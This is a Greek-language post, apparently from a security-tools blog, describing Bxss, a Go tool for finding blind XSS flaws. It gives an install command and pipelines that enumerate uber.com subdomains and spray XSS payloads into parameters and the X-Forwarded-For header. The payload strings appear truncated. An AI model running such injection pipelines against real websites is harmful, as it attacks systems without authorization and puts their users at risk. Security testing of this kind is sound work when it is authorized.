Το Bxss είναι ένα script γραμμένο σε go, που μας βοπθάει να ανακαλύπτουμε Blind XSS Injector κενά ασφαλείας.
Χαρακτηριστικά
Εισάγετε Blind XSS payloads σε προσαρμοσμένες κεφαλίδες
Εισάγετε Blind XSS payloads σε παραμέτρους
Χρησιμοποιεί διαφορετικές μεθόδους αιτήματος (PUT, POST, GET, OPTIONS) ταυτόχρονα
Διαθέτει μεγάλη αλυσίδα εργαλείων
Πραγματικά πολύ γρήγορο
Εύκολο στην εγκατάσταση
Εγκατάσταση
$ go get -u github.com/ethicalhackingplayground/bxss
Χρήση
Blind XSS In Parameters
$ subfinder uber.com | gau | grep “&” | bxss -appendMode -payload ‘”>‘ -parameters
Blind XSS In X-Forwarded-For Header
$ subfinder uber.com | gau | bxss -payload ‘”>‘ -header “X-Forwarded-For”
Στιγμιότυπα εφαρμογής
Μπορείτε να κατεβάσετε το πρόγραμμα από εδώ.